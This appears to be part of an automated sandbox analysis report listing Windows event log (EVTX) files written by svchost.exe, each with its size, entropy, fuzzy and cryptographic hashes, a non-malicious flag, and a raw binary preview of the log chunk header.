                                                      Preview:ElfChnk.>...............>...........................(.........................................................................FX................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 842246052603449135071232.000000 (libmagic misidentification: the preview starts with the EVTX chunk signature ElfChnk, so this is an event log chunk like the surrounding entries)
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.495006895073632
                                                      Encrypted:false
                                                      SSDEEP:384:PhN7s7o787l7r787a7J7z7+7N17g7n7O7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:P9vuCg
                                                      MD5:C91E3F9D54A9644A6EF8C430022B19F7
                                                      SHA1:E7DE5FB33C57B927F0F2E9071D5CAD49981AB6D5
                                                      SHA-256:6CC7E54BCE73786C2B3785A64CB383CFFC092BFD980364C44EA0DCF5212A4585
                                                      SHA-512:BB2B7E8A651B6B15A9E9230F92DF04C446DA98CA047924D0FDD107146BBA6E21AB314EEC88FE20BD3143439EFBE7E4013F01554935CA5966076126A7303C4964
                                                      Malicious:false
                                                      Preview:ElfChnk.Y.......g.......Y.......g............%...&........................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.1499045494600955
                                                      Encrypted:false
                                                      SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                      MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                      SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                      SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                      SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8164696340947971
                                                      Encrypted:false
                                                      SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                      MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                      SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                      SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                      SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                      Malicious:false
                                                      Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9855903635327656
                                                      Encrypted:false
                                                      SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                      MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                      SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                      SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                      SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.165454452307923
                                                      Encrypted:false
                                                      SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                      MD5:B6B6F199DA64422984403D7374F32528
                                                      SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                      SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                      SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                      Malicious:false
                                                      Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.8519554794255333
                                                      Encrypted:false
                                                      SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                      MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                      SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                      SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                      SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                      Malicious:false
                                                      Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.1642919553794224
                                                      Encrypted:false
                                                      SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                      MD5:D7EECF043241FDB9486580582E208603
                                                      SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                      SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                      SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):75320
                                                      Entropy (8bit):4.584265380899182
                                                      Encrypted:false
                                                      SSDEEP:768:4drIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbfdd:qa+Jao7mce8pBd
                                                      MD5:B418F9EC509AB0283BEAF4F4DB0E9E65
                                                      SHA1:BC1905B1FE88288918F67F109F029DF6937CA8AD
                                                      SHA-256:5F78426DACF50FF53B9F022B570A9B3EBB881DD26650FFD5CC1407BA239DC5AD
                                                      SHA-512:85A0DCA4F3A526D9F65C1C217F30519678F380E856BB27D37EBF58708192B0A24A4DD830576F2513AE1F95B150C371861DE6A1DF3294A0D012DDDEC70B01C302
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................h ...L.......................................................................b..........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........5.S...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.1786182773625786
                                                      Encrypted:false
                                                      SSDEEP:384:dhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUm01Um:dY7Lx
                                                      MD5:BB8FF89438923392DAE2BB7134E1FE2E
                                                      SHA1:79A4A32180C3CB2C65B2B14B716871D23BE51F0A
                                                      SHA-256:550E9A50F7CC7479B86E5429D1FD4EC5AC24E3182FB9A54C9A76F9878A1DBBB5
                                                      SHA-512:B408420BEEDA26E48BF8699FC64A87E95848058216B482531F89F809DF58E49135F33DD66B50E41E02C80EA39256394C26F80014A2B632C8D26BBEEC9A224801
                                                      Malicious:false
                                                      Preview:ElfChnk....................................../..(4..........................................................................F.T................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.20396616148121466
                                                      Encrypted:false
                                                      SSDEEP:48:MICW4VbrP+MZQNRBEZWTENO4bpBkoFlf/6FgVt:krKNVaO80orf/6Fg
                                                      MD5:5B246B6936E1BEF6FF1CC58CE61AA137
                                                      SHA1:34DAFA59311D0BAD123A571B43D487CC0041A9C3
                                                      SHA-256:0B29ED316F526B0BEA0481B6AF85248E71AEDBEDDEBA79B2BE12B965E925BCB7
                                                      SHA-512:8EBFA19BDA6B7C2A64A539DFA9323E766EF04680BB163FC71FB33DBB72041A133489870A3CA82AFE5AED633ABB4AA13F29CA44D25B2A99C9FB14946655B7F358
                                                      Malicious:false
                                                      Preview:ElfChnk...............................................L......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**................H...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.6469884746870727
                                                      Encrypted:false
                                                      SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                      MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                      SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                      SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                      SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                      Malicious:false
                                                      Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.3996091976763037
                                                      Encrypted:false
                                                      SSDEEP:768:Z6a0NHaPaLabaTabaraTajaXazaHa7aXazanaTara7aLaLa/aTaDafa7afaLaraD:ON
                                                      MD5:A0CD4A428D9120766250F644EE3B7B17
                                                      SHA1:C6BD970410AF5DA9985443BC2F2178EAA27D0D88
                                                      SHA-256:6028067A6CEF44AF38B9B991CFF7D35B592A87C52FBA0F90C29B6ADB5277F17A
                                                      SHA-512:0EF1557F5127C3A1C4B8C95D44B34F99B1BAD1A0C4E63E09C6E9D2BC211D03A73B0BFF97FAE09CA620B4DB39DFB3BF65CB01F6D367075D578DA595A3CF9DC05D
                                                      Malicious:false
                                                      Preview:ElfChnk.........@...............@...............`...6.........................................................................................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H............<4...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.3132453844344478
                                                      Encrypted:false
                                                      SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                      MD5:6237EE0458A0478242B975E9BB7AA97D
                                                      SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                      SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                      SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.325262033408211
                                                      Encrypted:false
                                                      SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                      MD5:D13189B45679E53F5744A4D449F8B00F
                                                      SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                      SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                      SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7947046118743749
                                                      Encrypted:false
                                                      SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                      MD5:55E73A924B170FBFFF862E8E195E839A
                                                      SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                      SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                      SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                      Malicious:false
                                                      Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131880
                                                      Entropy (8bit):4.371726387102516
                                                      Encrypted:false
                                                      SSDEEP:384:LzRUxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdG:LmxA8nPLGbsxA8nPLGbq
                                                      MD5:B03BA6C2B8AE3E0A6C3514C7C6604075
                                                      SHA1:7F8FB531593EC1B489FBCD44A50A3BC41F110B9E
                                                      SHA-256:D319C8167A393CCA8F6356A8274CD90E0DEE7B04274D15CDB1B9398EBEA5004F
                                                      SHA-512:7BD96E2B2A4DA446F2249A89BA072A69041DC0380FBDCBE526F9B6807CB623D6637B0486166E366948911C02A027AC1F6C3670F8BB2F91F33827721EC177EAB0
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................@...0....@.......................................................................2x......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**................2..!.........x68................................................................<.......T.....!................@..2..!..[...'YE.1o..][G....T........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...(~K.6.......N.......(.......................{.2.5.8.7.F.2.7.F.-.D.C.3.6.-.4.1.C.E.-.B.5.3.4.-.5.B.7.B.5.2.C.8.F.7.1.C.}...8.8.7.8.4.9...N.T. .A
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.273338343434408
                                                      Encrypted:false
                                                      SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                      MD5:C37372EB51AEDB4552CB839C7294403A
                                                      SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                      SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                      SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                      Malicious:false
                                                      Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.231195890775603
                                                      Encrypted:false
                                                      SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                      MD5:3365A34953FD7B16667108A049B64DA5
                                                      SHA1:C72421A58E063D64072152344B266F8306A78702
                                                      SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                      SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                      Malicious:false
                                                      Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.3512651468301184
                                                      Encrypted:false
                                                      SSDEEP:384:vh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwK:vOqabeGTnbuSxgB
                                                      MD5:8D6619A4126B5582CEAC45E692BA2951
                                                      SHA1:3D149C8F9EFAB645E1330EC79B1EE3F517543F83
                                                      SHA-256:D96AA1A21202CBD8CC68AB1ACE715016DCDC973C72E7815D2DCDFAF461555263
                                                      SHA-512:BB740ED0DA5AB8E5D51C82FDB2C056709E427257C710CC811FE9938EA30E87A5C7A10379724F9101E9DE27A99B648F3FBE03C6E1DD53E18F6FE87475632B55F2
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................H...x...$zi.....................................................................d?).............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
